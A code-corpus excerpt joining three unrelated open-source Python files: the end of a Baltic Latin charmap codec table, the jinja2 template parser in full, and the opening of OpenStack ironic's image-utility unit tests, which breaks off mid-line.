'y' # 0x79 -> LATIN SMALL LETTER Y 'z' # 0x7A -> LATIN SMALL LETTER Z '{' # 0x7B -> LEFT CURLY BRACKET '|' # 0x7C -> VERTICAL LINE '}' # 0x7D -> RIGHT CURLY BRACKET '~' # 0x7E -> TILDE '\x7f' # 0x7F -> DELETE '\x80' # 0x80 -> <control> '\x81' # 0x81 -> <control> '\x82' # 0x82 -> <control> '\x83' # 0x83 -> <control> '\x84' # 0x84 -> <control> '\x85' # 0x85 -> <control> '\x86' # 0x86 -> <control> '\x87' # 0x87 -> <control> '\x88' # 0x88 -> <control> '\x89' # 0x89 -> <control> '\x8a' # 0x8A -> <control> '\x8b' # 0x8B -> <control> '\x8c' # 0x8C -> <control> '\x8d' # 0x8D -> <control> '\x8e' # 0x8E -> <control> '\x8f' # 0x8F -> <control> '\x90' # 0x90 -> <control> '\x91' # 0x91 -> <control> '\x92' # 0x92 -> <control> '\x93' # 0x93 -> <control> '\x94' # 0x94 -> <control> '\x95' # 0x95 -> <control> '\x96' # 0x96 -> <control> '\x97' # 0x97 -> <control> '\x98' # 0x98 -> <control> '\x99' # 0x99 -> <control> '\x9a' # 0x9A -> <control> '\x9b' # 0x9B -> <control> '\x9c' # 0x9C -> <control> '\x9d' # 0x9D -> <control> '\x9e' # 0x9E -> <control> '\x9f' # 0x9F -> <control> '\xa0' # 0xA0 -> NO-BREAK SPACE '\u0104' # 0xA1 -> LATIN CAPITAL LETTER A WITH OGONEK '\u0112' # 0xA2 -> LATIN CAPITAL LETTER E WITH MACRON '\u0122' # 0xA3 -> LATIN CAPITAL LETTER G WITH CEDILLA '\u012a' # 0xA4 -> LATIN CAPITAL LETTER I WITH MACRON '\u0128' # 0xA5 -> LATIN CAPITAL LETTER I WITH TILDE '\u0136' # 0xA6 -> LATIN CAPITAL LETTER K WITH CEDILLA '\xa7' # 0xA7 -> SECTION SIGN '\u013b' # 0xA8 -> LATIN CAPITAL LETTER L WITH CEDILLA '\u0110' # 0xA9 -> LATIN CAPITAL LETTER D WITH STROKE '\u0160' # 0xAA -> LATIN CAPITAL LETTER S WITH CARON '\u0166' # 0xAB -> LATIN CAPITAL LETTER T WITH STROKE '\u017d' # 0xAC -> LATIN CAPITAL LETTER Z WITH CARON '\xad' # 0xAD -> SOFT HYPHEN '\u016a' # 0xAE -> LATIN CAPITAL LETTER U WITH MACRON '\u014a' # 0xAF -> LATIN CAPITAL LETTER ENG '\xb0' # 0xB0 -> DEGREE SIGN '\u0105' # 0xB1 -> LATIN SMALL LETTER A WITH OGONEK '\u0113' # 0xB2 -> LATIN SMALL LETTER E WITH MACRON '\u0123' # 0xB3 -> LATIN SMALL LETTER G WITH CEDILLA '\u012b' # 0xB4 -> LATIN SMALL LETTER I WITH MACRON '\u0129' # 0xB5 -> LATIN SMALL LETTER I WITH TILDE '\u0137' # 0xB6 -> LATIN SMALL LETTER K WITH CEDILLA '\xb7' # 0xB7 -> MIDDLE DOT '\u013c' # 0xB8 -> LATIN SMALL LETTER L WITH CEDILLA '\u0111' # 0xB9 -> LATIN SMALL LETTER D WITH STROKE '\u0161' # 0xBA -> LATIN SMALL LETTER S WITH CARON '\u0167' # 0xBB -> LATIN SMALL LETTER T WITH STROKE '\u017e' # 0xBC -> LATIN SMALL LETTER Z WITH CARON '\u2015' # 0xBD -> HORIZONTAL BAR '\u016b' # 0xBE -> LATIN SMALL LETTER U WITH MACRON '\u014b' # 0xBF -> LATIN SMALL LETTER ENG '\u0100' # 0xC0 -> LATIN CAPITAL LETTER A WITH MACRON '\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE '\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX '\xc3' # 0xC3 -> LATIN CAPITAL LETTER A WITH TILDE '\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS '\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE '\xc6' # 0xC6 -> LATIN CAPITAL LETTER AE '\u012e' # 0xC7 -> LATIN CAPITAL LETTER I WITH OGONEK '\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON '\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE '\u0118' # 0xCA -> LATIN CAPITAL LETTER E WITH OGONEK '\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS '\u0116' # 0xCC -> LATIN CAPITAL LETTER E WITH DOT ABOVE '\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE '\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX '\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS '\xd0' # 0xD0 -> LATIN CAPITAL LETTER ETH (Icelandic) '\u0145' # 0xD1 -> LATIN CAPITAL LETTER N WITH CEDILLA '\u014c' # 0xD2 -> LATIN CAPITAL LETTER O WITH MACRON '\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE '\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX '\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE '\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS '\u0168' # 0xD7 -> LATIN CAPITAL LETTER U WITH TILDE '\xd8' # 0xD8 -> LATIN CAPITAL LETTER O WITH STROKE '\u0172' # 0xD9 -> LATIN CAPITAL LETTER U WITH OGONEK '\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE '\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX '\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS '\xdd' # 0xDD -> LATIN CAPITAL LETTER Y WITH ACUTE '\xde' # 0xDE -> LATIN CAPITAL LETTER THORN (Icelandic) '\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S (German) '\u0101' # 0xE0 -> LATIN SMALL LETTER A WITH MACRON '\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE '\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX '\xe3' # 0xE3 -> LATIN SMALL LETTER A WITH TILDE '\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS '\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE '\xe6' # 0xE6 -> LATIN SMALL LETTER AE '\u012f' # 0xE7 -> LATIN SMALL LETTER I WITH OGONEK '\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON '\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE '\u0119' # 0xEA -> LATIN SMALL LETTER E WITH OGONEK '\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS '\u0117' # 0xEC -> LATIN SMALL LETTER E WITH DOT ABOVE '\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE '\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX '\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS '\xf0' # 0xF0 -> LATIN SMALL LETTER ETH (Icelandic) '\u0146' # 0xF1 -> LATIN SMALL LETTER N WITH CEDILLA '\u014d' # 0xF2 -> LATIN SMALL LETTER O WITH MACRON '\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE '\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX '\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE '\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS '\u0169' # 0xF7 -> LATIN SMALL LETTER U WITH TILDE '\xf8' # 0xF8 -> LATIN SMALL LETTER O WITH STROKE '\u0173' # 0xF9 -> LATIN SMALL LETTER U WITH OGONEK '\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE '\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX '\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS '\xfd' # 0xFD -> LATIN SMALL LETTER Y WITH ACUTE '\xfe' # 0xFE -> LATIN SMALL LETTER THORN (Icelandic) '\u0138' # 0xFF -> LATIN SMALL LETTER KRA ) ### Encoding table encoding_table=codecs.charmap_build(decoding_table)
apache-2.0
xxhank/namebench
nb_third_party/jinja2/parser.py
215
34717
# -*- coding: utf-8 -*- """ jinja2.parser ~~~~~~~~~~~~~ Implements the template parser. :copyright: (c) 2010 by the Jinja Team. :license: BSD, see LICENSE for more details. """ from jinja2 import nodes from jinja2.exceptions import TemplateSyntaxError, TemplateAssertionError from jinja2.utils import next from jinja2.lexer import describe_token, describe_token_expr #: statements that callinto _statement_keywords = frozenset(['for', 'if', 'block', 'extends', 'print', 'macro', 'include', 'from', 'import', 'set']) _compare_operators = frozenset(['eq', 'ne', 'lt', 'lteq', 'gt', 'gteq']) class Parser(object): """This is the central parsing class Jinja2 uses. It's passed to extensions and can be used to parse expressions or statements. """ def __init__(self, environment, source, name=None, filename=None, state=None): self.environment = environment self.stream = environment._tokenize(source, name, filename, state) self.name = name self.filename = filename self.closed = False self.extensions = {} for extension in environment.iter_extensions(): for tag in extension.tags: self.extensions[tag] = extension.parse self._last_identifier = 0 self._tag_stack = [] self._end_token_stack = [] def fail(self, msg, lineno=None, exc=TemplateSyntaxError): """Convenience method that raises `exc` with the message, passed line number or last line number as well as the current name and filename. """ if lineno is None: lineno = self.stream.current.lineno raise exc(msg, lineno, self.name, self.filename) def _fail_ut_eof(self, name, end_token_stack, lineno): expected = [] for exprs in end_token_stack: expected.extend(map(describe_token_expr, exprs)) if end_token_stack: currently_looking = ' or '.join( "'%s'" % describe_token_expr(expr) for expr in end_token_stack[-1]) else: currently_looking = None if name is None: message = ['Unexpected end of template.'] else: message = ['Encountered unknown tag \'%s\'.' % name] if currently_looking: if name is not None and name in expected: message.append('You probably made a nesting mistake. Jinja ' 'is expecting this tag, but currently looking ' 'for %s.' % currently_looking) else: message.append('Jinja was looking for the following tags: ' '%s.' % currently_looking) if self._tag_stack: message.append('The innermost block that needs to be ' 'closed is \'%s\'.' % self._tag_stack[-1]) self.fail(' '.join(message), lineno) def fail_unknown_tag(self, name, lineno=None): """Called if the parser encounters an unknown tag. Tries to fail with a human readable error message that could help to identify the problem. """ return self._fail_ut_eof(name, self._end_token_stack, lineno) def fail_eof(self, end_tokens=None, lineno=None): """Like fail_unknown_tag but for end of template situations.""" stack = list(self._end_token_stack) if end_tokens is not None: stack.append(end_tokens) return self._fail_ut_eof(None, stack, lineno) def is_tuple_end(self, extra_end_rules=None): """Are we at the end of a tuple?""" if self.stream.current.type in ('variable_end', 'block_end', 'rparen'): return True elif extra_end_rules is not None: return self.stream.current.test_any(extra_end_rules) return False def free_identifier(self, lineno=None): """Return a new free identifier as :class:`~jinja2.nodes.InternalName`.""" self._last_identifier += 1 rv = object.__new__(nodes.InternalName) nodes.Node.__init__(rv, 'fi%d' % self._last_identifier, lineno=lineno) return rv def parse_statement(self): """Parse a single statement.""" token = self.stream.current if token.type != 'name': self.fail('tag name expected', token.lineno) self._tag_stack.append(token.value) pop_tag = True try: if token.value in _statement_keywords: return getattr(self, 'parse_' + self.stream.current.value)() if token.value == 'call': return self.parse_call_block() if token.value == 'filter': return self.parse_filter_block() ext = self.extensions.get(token.value) if ext is not None: return ext(self) # did not work out, remove the token we pushed by accident # from the stack so that the unknown tag fail function can # produce a proper error message. self._tag_stack.pop() pop_tag = False self.fail_unknown_tag(token.value, token.lineno) finally: if pop_tag: self._tag_stack.pop() def parse_statements(self, end_tokens, drop_needle=False): """Parse multiple statements into a list until one of the end tokens is reached. This is used to parse the body of statements as it also parses template data if appropriate. The parser checks first if the current token is a colon and skips it if there is one. Then it checks for the block end and parses until if one of the `end_tokens` is reached. Per default the active token in the stream at the end of the call is the matched end token. If this is not wanted `drop_needle` can be set to `True` and the end token is removed. """ # the first token may be a colon for python compatibility self.stream.skip_if('colon') # in the future it would be possible to add whole code sections # by adding some sort of end of statement token and parsing those here. self.stream.expect('block_end') result = self.subparse(end_tokens) # we reached the end of the template too early, the subparser # does not check for this, so we do that now if self.stream.current.type == 'eof': self.fail_eof(end_tokens) if drop_needle: next(self.stream) return result def parse_set(self): """Parse an assign statement.""" lineno = next(self.stream).lineno target = self.parse_assign_target() self.stream.expect('assign') expr = self.parse_tuple() return nodes.Assign(target, expr, lineno=lineno) def parse_for(self): """Parse a for loop.""" lineno = self.stream.expect('name:for').lineno target = self.parse_assign_target(extra_end_rules=('name:in',)) self.stream.expect('name:in') iter = self.parse_tuple(with_condexpr=False, extra_end_rules=('name:recursive',)) test = None if self.stream.skip_if('name:if'): test = self.parse_expression() recursive = self.stream.skip_if('name:recursive') body = self.parse_statements(('name:endfor', 'name:else')) if next(self.stream).value == 'endfor': else_ = [] else: else_ = self.parse_statements(('name:endfor',), drop_needle=True) return nodes.For(target, iter, body, else_, test, recursive, lineno=lineno) def parse_if(self): """Parse an if construct.""" node = result = nodes.If(lineno=self.stream.expect('name:if').lineno) while 1: node.test = self.parse_tuple(with_condexpr=False) node.body = self.parse_statements(('name:elif', 'name:else', 'name:endif')) token = next(self.stream) if token.test('name:elif'): new_node = nodes.If(lineno=self.stream.current.lineno) node.else_ = [new_node] node = new_node continue elif token.test('name:else'): node.else_ = self.parse_statements(('name:endif',), drop_needle=True) else: node.else_ = [] break return result def parse_block(self): node = nodes.Block(lineno=next(self.stream).lineno) node.name = self.stream.expect('name').value node.scoped = self.stream.skip_if('name:scoped') # common problem people encounter when switching from django # to jinja. we do not support hyphens in block names, so let's # raise a nicer error message in that case. if self.stream.current.type == 'sub': self.fail('Block names in Jinja have to be valid Python ' 'identifiers and may not contain hypens, use an ' 'underscore instead.') node.body = self.parse_statements(('name:endblock',), drop_needle=True) self.stream.skip_if('name:' + node.name) return node def parse_extends(self): node = nodes.Extends(lineno=next(self.stream).lineno) node.template = self.parse_expression() return node def parse_import_context(self, node, default): if self.stream.current.test_any('name:with', 'name:without') and \ self.stream.look().test('name:context'): node.with_context = next(self.stream).value == 'with' self.stream.skip() else: node.with_context = default return node def parse_include(self): node = nodes.Include(lineno=next(self.stream).lineno) node.template = self.parse_expression() if self.stream.current.test('name:ignore') and \ self.stream.look().test('name:missing'): node.ignore_missing = True self.stream.skip(2) else: node.ignore_missing = False return self.parse_import_context(node, True) def parse_import(self): node = nodes.Import(lineno=next(self.stream).lineno) node.template = self.parse_expression() self.stream.expect('name:as') node.target = self.parse_assign_target(name_only=True).name return self.parse_import_context(node, False) def parse_from(self): node = nodes.FromImport(lineno=next(self.stream).lineno) node.template = self.parse_expression() self.stream.expect('name:import') node.names = [] def parse_context(): if self.stream.current.value in ('with', 'without') and \ self.stream.look().test('name:context'): node.with_context = next(self.stream).value == 'with' self.stream.skip() return True return False while 1: if node.names: self.stream.expect('comma') if self.stream.current.type == 'name': if parse_context(): break target = self.parse_assign_target(name_only=True) if target.name.startswith('_'): self.fail('names starting with an underline can not ' 'be imported', target.lineno, exc=TemplateAssertionError) if self.stream.skip_if('name:as'): alias = self.parse_assign_target(name_only=True) node.names.append((target.name, alias.name)) else: node.names.append(target.name) if parse_context() or self.stream.current.type != 'comma': break else: break if not hasattr(node, 'with_context'): node.with_context = False self.stream.skip_if('comma') return node def parse_signature(self, node): node.args = args = [] node.defaults = defaults = [] self.stream.expect('lparen') while self.stream.current.type != 'rparen': if args: self.stream.expect('comma') arg = self.parse_assign_target(name_only=True) arg.set_ctx('param') if self.stream.skip_if('assign'): defaults.append(self.parse_expression()) args.append(arg) self.stream.expect('rparen') def parse_call_block(self): node = nodes.CallBlock(lineno=next(self.stream).lineno) if self.stream.current.type == 'lparen': self.parse_signature(node) else: node.args = [] node.defaults = [] node.call = self.parse_expression() if not isinstance(node.call, nodes.Call): self.fail('expected call', node.lineno) node.body = self.parse_statements(('name:endcall',), drop_needle=True) return node def parse_filter_block(self): node = nodes.FilterBlock(lineno=next(self.stream).lineno) node.filter = self.parse_filter(None, start_inline=True) node.body = self.parse_statements(('name:endfilter',), drop_needle=True) return node def parse_macro(self): node = nodes.Macro(lineno=next(self.stream).lineno) node.name = self.parse_assign_target(name_only=True).name self.parse_signature(node) node.body = self.parse_statements(('name:endmacro',), drop_needle=True) return node def parse_print(self): node = nodes.Output(lineno=next(self.stream).lineno) node.nodes = [] while self.stream.current.type != 'block_end': if node.nodes: self.stream.expect('comma') node.nodes.append(self.parse_expression()) return node def parse_assign_target(self, with_tuple=True, name_only=False, extra_end_rules=None): """Parse an assignment target. As Jinja2 allows assignments to tuples, this function can parse all allowed assignment targets. Per default assignments to tuples are parsed, that can be disable however by setting `with_tuple` to `False`. If only assignments to names are wanted `name_only` can be set to `True`. The `extra_end_rules` parameter is forwarded to the tuple parsing function. """ if name_only: token = self.stream.expect('name') target = nodes.Name(token.value, 'store', lineno=token.lineno) else: if with_tuple: target = self.parse_tuple(simplified=True, extra_end_rules=extra_end_rules) else: target = self.parse_primary(with_postfix=False) target.set_ctx('store') if not target.can_assign(): self.fail('can\'t assign to %r' % target.__class__. __name__.lower(), target.lineno) return target def parse_expression(self, with_condexpr=True): """Parse an expression. Per default all expressions are parsed, if the optional `with_condexpr` parameter is set to `False` conditional expressions are not parsed. """ if with_condexpr: return self.parse_condexpr() return self.parse_or() def parse_condexpr(self): lineno = self.stream.current.lineno expr1 = self.parse_or() while self.stream.skip_if('name:if'): expr2 = self.parse_or() if self.stream.skip_if('name:else'): expr3 = self.parse_condexpr() else: expr3 = None expr1 = nodes.CondExpr(expr2, expr1, expr3, lineno=lineno) lineno = self.stream.current.lineno return expr1 def parse_or(self): lineno = self.stream.current.lineno left = self.parse_and() while self.stream.skip_if('name:or'): right = self.parse_and() left = nodes.Or(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_and(self): lineno = self.stream.current.lineno left = self.parse_not() while self.stream.skip_if('name:and'): right = self.parse_not() left = nodes.And(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_not(self): if self.stream.current.test('name:not'): lineno = next(self.stream).lineno return nodes.Not(self.parse_not(), lineno=lineno) return self.parse_compare() def parse_compare(self): lineno = self.stream.current.lineno expr = self.parse_add() ops = [] while 1: token_type = self.stream.current.type if token_type in _compare_operators: next(self.stream) ops.append(nodes.Operand(token_type, self.parse_add())) elif self.stream.skip_if('name:in'): ops.append(nodes.Operand('in', self.parse_add())) elif self.stream.current.test('name:not') and \ self.stream.look().test('name:in'): self.stream.skip(2) ops.append(nodes.Operand('notin', self.parse_add())) else: break lineno = self.stream.current.lineno if not ops: return expr return nodes.Compare(expr, ops, lineno=lineno) def parse_add(self): lineno = self.stream.current.lineno left = self.parse_sub() while self.stream.current.type == 'add': next(self.stream) right = self.parse_sub() left = nodes.Add(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_sub(self): lineno = self.stream.current.lineno left = self.parse_concat() while self.stream.current.type == 'sub': next(self.stream) right = self.parse_concat() left = nodes.Sub(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_concat(self): lineno = self.stream.current.lineno args = [self.parse_mul()] while self.stream.current.type == 'tilde': next(self.stream) args.append(self.parse_mul()) if len(args) == 1: return args[0] return nodes.Concat(args, lineno=lineno) def parse_mul(self): lineno = self.stream.current.lineno left = self.parse_div() while self.stream.current.type == 'mul': next(self.stream) right = self.parse_div() left = nodes.Mul(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_div(self): lineno = self.stream.current.lineno left = self.parse_floordiv() while self.stream.current.type == 'div': next(self.stream) right = self.parse_floordiv() left = nodes.Div(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_floordiv(self): lineno = self.stream.current.lineno left = self.parse_mod() while self.stream.current.type == 'floordiv': next(self.stream) right = self.parse_mod() left = nodes.FloorDiv(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_mod(self): lineno = self.stream.current.lineno left = self.parse_pow() while self.stream.current.type == 'mod': next(self.stream) right = self.parse_pow() left = nodes.Mod(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_pow(self): lineno = self.stream.current.lineno left = self.parse_unary() while self.stream.current.type == 'pow': next(self.stream) right = self.parse_unary() left = nodes.Pow(left, right, lineno=lineno) lineno = self.stream.current.lineno return left def parse_unary(self): token_type = self.stream.current.type lineno = self.stream.current.lineno if token_type == 'sub': next(self.stream) node = self.parse_unary() return nodes.Neg(node, lineno=lineno) if token_type == 'add': next(self.stream) node = self.parse_unary() return nodes.Pos(node, lineno=lineno) return self.parse_primary() def parse_primary(self, with_postfix=True): token = self.stream.current if token.type == 'name': if token.value in ('true', 'false', 'True', 'False'): node = nodes.Const(token.value in ('true', 'True'), lineno=token.lineno) elif token.value in ('none', 'None'): node = nodes.Const(None, lineno=token.lineno) else: node = nodes.Name(token.value, 'load', lineno=token.lineno) next(self.stream) elif token.type == 'string': next(self.stream) buf = [token.value] lineno = token.lineno while self.stream.current.type == 'string': buf.append(self.stream.current.value) next(self.stream) node = nodes.Const(''.join(buf), lineno=lineno) elif token.type in ('integer', 'float'): next(self.stream) node = nodes.Const(token.value, lineno=token.lineno) elif token.type == 'lparen': next(self.stream) node = self.parse_tuple(explicit_parentheses=True) self.stream.expect('rparen') elif token.type == 'lbracket': node = self.parse_list() elif token.type == 'lbrace': node = self.parse_dict() else: self.fail("unexpected '%s'" % describe_token(token), token.lineno) if with_postfix: node = self.parse_postfix(node) return node def parse_tuple(self, simplified=False, with_condexpr=True, extra_end_rules=None, explicit_parentheses=False): """Works like `parse_expression` but if multiple expressions are delimited by a comma a :class:`~jinja2.nodes.Tuple` node is created. This method could also return a regular expression instead of a tuple if no commas where found. The default parsing mode is a full tuple. If `simplified` is `True` only names and literals are parsed. The `no_condexpr` parameter is forwarded to :meth:`parse_expression`. Because tuples do not require delimiters and may end in a bogus comma an extra hint is needed that marks the end of a tuple. For example for loops support tuples between `for` and `in`. In that case the `extra_end_rules` is set to ``['name:in']``. `explicit_parentheses` is true if the parsing was triggered by an expression in parentheses. This is used to figure out if an empty tuple is a valid expression or not. """ lineno = self.stream.current.lineno if simplified: parse = lambda: self.parse_primary(with_postfix=False) elif with_condexpr: parse = self.parse_expression else: parse = lambda: self.parse_expression(with_condexpr=False) args = [] is_tuple = False while 1: if args: self.stream.expect('comma') if self.is_tuple_end(extra_end_rules): break args.append(parse()) if self.stream.current.type == 'comma': is_tuple = True else: break lineno = self.stream.current.lineno if not is_tuple: if args: return args[0] # if we don't have explicit parentheses, an empty tuple is # not a valid expression. This would mean nothing (literally # nothing) in the spot of an expression would be an empty # tuple. if not explicit_parentheses: self.fail('Expected an expression, got \'%s\'' % describe_token(self.stream.current)) return nodes.Tuple(args, 'load', lineno=lineno) def parse_list(self): token = self.stream.expect('lbracket') items = [] while self.stream.current.type != 'rbracket': if items: self.stream.expect('comma') if self.stream.current.type == 'rbracket': break items.append(self.parse_expression()) self.stream.expect('rbracket') return nodes.List(items, lineno=token.lineno) def parse_dict(self): token = self.stream.expect('lbrace') items = [] while self.stream.current.type != 'rbrace': if items: self.stream.expect('comma') if self.stream.current.type == 'rbrace': break key = self.parse_expression() self.stream.expect('colon') value = self.parse_expression() items.append(nodes.Pair(key, value, lineno=key.lineno)) self.stream.expect('rbrace') return nodes.Dict(items, lineno=token.lineno) def parse_postfix(self, node): while 1: token_type = self.stream.current.type if token_type == 'dot' or token_type == 'lbracket': node = self.parse_subscript(node) elif token_type == 'lparen': node = self.parse_call(node) elif token_type == 'pipe': node = self.parse_filter(node) elif token_type == 'name' and self.stream.current.value == 'is': node = self.parse_test(node) else: break return node def parse_subscript(self, node): token = next(self.stream) if token.type == 'dot': attr_token = self.stream.current next(self.stream) if attr_token.type == 'name': return nodes.Getattr(node, attr_token.value, 'load', lineno=token.lineno) elif attr_token.type != 'integer': self.fail('expected name or number', attr_token.lineno) arg = nodes.Const(attr_token.value, lineno=attr_token.lineno) return nodes.Getitem(node, arg, 'load', lineno=token.lineno) if token.type == 'lbracket': priority_on_attribute = False args = [] while self.stream.current.type != 'rbracket': if args: self.stream.expect('comma') args.append(self.parse_subscribed()) self.stream.expect('rbracket') if len(args) == 1: arg = args[0] else: arg = nodes.Tuple(args, 'load', lineno=token.lineno) return nodes.Getitem(node, arg, 'load', lineno=token.lineno) self.fail('expected subscript expression', self.lineno) def parse_subscribed(self): lineno = self.stream.current.lineno if self.stream.current.type == 'colon': next(self.stream) args = [None] else: node = self.parse_expression() if self.stream.current.type != 'colon': return node next(self.stream) args = [node] if self.stream.current.type == 'colon': args.append(None) elif self.stream.current.type not in ('rbracket', 'comma'): args.append(self.parse_expression()) else: args.append(None) if self.stream.current.type == 'colon': next(self.stream) if self.stream.current.type not in ('rbracket', 'comma'): args.append(self.parse_expression()) else: args.append(None) else: args.append(None) return nodes.Slice(lineno=lineno, *args) def parse_call(self, node): token = self.stream.expect('lparen') args = [] kwargs = [] dyn_args = dyn_kwargs = None require_comma = False def ensure(expr): if not expr: self.fail('invalid syntax for function call expression', token.lineno) while self.stream.current.type != 'rparen': if require_comma: self.stream.expect('comma') # support for trailing comma if self.stream.current.type == 'rparen': break if self.stream.current.type == 'mul': ensure(dyn_args is None and dyn_kwargs is None) next(self.stream) dyn_args = self.parse_expression() elif self.stream.current.type == 'pow': ensure(dyn_kwargs is None) next(self.stream) dyn_kwargs = self.parse_expression() else: ensure(dyn_args is None and dyn_kwargs is None) if self.stream.current.type == 'name' and \ self.stream.look().type == 'assign': key = self.stream.current.value self.stream.skip(2) value = self.parse_expression() kwargs.append(nodes.Keyword(key, value, lineno=value.lineno)) else: ensure(not kwargs) args.append(self.parse_expression()) require_comma = True self.stream.expect('rparen') if node is None: return args, kwargs, dyn_args, dyn_kwargs return nodes.Call(node, args, kwargs, dyn_args, dyn_kwargs, lineno=token.lineno) def parse_filter(self, node, start_inline=False): while self.stream.current.type == 'pipe' or start_inline: if not start_inline: next(self.stream) token = self.stream.expect('name') name = token.value while self.stream.current.type == 'dot': next(self.stream) name += '.' + self.stream.expect('name').value if self.stream.current.type == 'lparen': args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None) else: args = [] kwargs = [] dyn_args = dyn_kwargs = None node = nodes.Filter(node, name, args, kwargs, dyn_args, dyn_kwargs, lineno=token.lineno) start_inline = False return node def parse_test(self, node): token = next(self.stream) if self.stream.current.test('name:not'): next(self.stream) negated = True else: negated = False name = self.stream.expect('name').value while self.stream.current.type == 'dot': next(self.stream) name += '.' + self.stream.expect('name').value dyn_args = dyn_kwargs = None kwargs = [] if self.stream.current.type == 'lparen': args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None) elif self.stream.current.type in ('name', 'string', 'integer', 'float', 'lparen', 'lbracket', 'lbrace') and not \ self.stream.current.test_any('name:else', 'name:or', 'name:and'): if self.stream.current.test('name:is'): self.fail('You cannot chain multiple tests with is') args = [self.parse_expression()] else: args = [] node = nodes.Test(node, name, args, kwargs, dyn_args, dyn_kwargs, lineno=token.lineno) if negated: node = nodes.Not(node, lineno=token.lineno) return node def subparse(self, end_tokens=None): body = [] data_buffer = [] add_data = data_buffer.append if end_tokens is not None: self._end_token_stack.append(end_tokens) def flush_data(): if data_buffer: lineno = data_buffer[0].lineno body.append(nodes.Output(data_buffer[:], lineno=lineno)) del data_buffer[:] try: while self.stream: token = self.stream.current if token.type == 'data': if token.value: add_data(nodes.TemplateData(token.value, lineno=token.lineno)) next(self.stream) elif token.type == 'variable_begin': next(self.stream) add_data(self.parse_tuple(with_condexpr=True)) self.stream.expect('variable_end') elif token.type == 'block_begin': flush_data() next(self.stream) if end_tokens is not None and \ self.stream.current.test_any(*end_tokens): return body rv = self.parse_statement() if isinstance(rv, list): body.extend(rv) else: body.append(rv) self.stream.expect('block_end') else: raise AssertionError('internal parsing error') flush_data() finally: if end_tokens is not None: self._end_token_stack.pop() return body def parse(self): """Parse the whole template into a `Template` node.""" result = nodes.Template(self.subparse(), lineno=1) result.set_environment(self.environment) return result
apache-2.0
Tehsmash/ironic
ironic/tests/test_images.py
1
20411
# Vim: tabstop=4 shiftwidth=4 softtabstop=4 # coding=utf-8 # Copyright 2013 Hewlett-Packard Development Company, L.P. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import shutil import mock from oslo.concurrency import processutils from oslo.config import cfg import six.moves.builtins as __builtin__ from ironic.common import exception from ironic.common import image_service from ironic.common import images from ironic.common import utils from ironic.openstack.common import imageutils from ironic.tests import base CONF = cfg.CONF class IronicImagesTestCase(base.TestCase): class FakeImgInfo(object): pass @mock.patch.object(imageutils, 'QemuImgInfo') @mock.patch.object(os.path, 'exists', return_value=False) def test_qemu_img_info_path_doesnt_exist(self, path_exists_mock, qemu_img_info_mock): images.qemu_img_info('noimg') path_exists_mock.assert_called_once_with('noimg') qemu_img_info_mock.assert_called_once_with() @mock.patch.object(utils, 'execute', return_value=('out', 'err')) @mock.patch.object(imageutils, 'QemuImgInfo') @mock.patch.object(os.path, 'exists', return_value=True) def test_qemu_img_info_path_exists(self, path_exists_mock, qemu_img_info_mock, execute_mock): images.qemu_img_info('img') path_exists_mock.assert_called_once_with('img') execute_mock.assert_called_once_with('env', 'LC_ALL=C', 'LANG=C', 'qemu-img', 'info', 'img') qemu_img_info_mock.assert_called_once_with('out') @mock.patch.object(utils, 'execute') def test_convert_image(self, execute_mock): images.convert_image('source', 'dest', 'out_format') execute_mock.assert_called_once_with('qemu-img', 'convert', '-O', 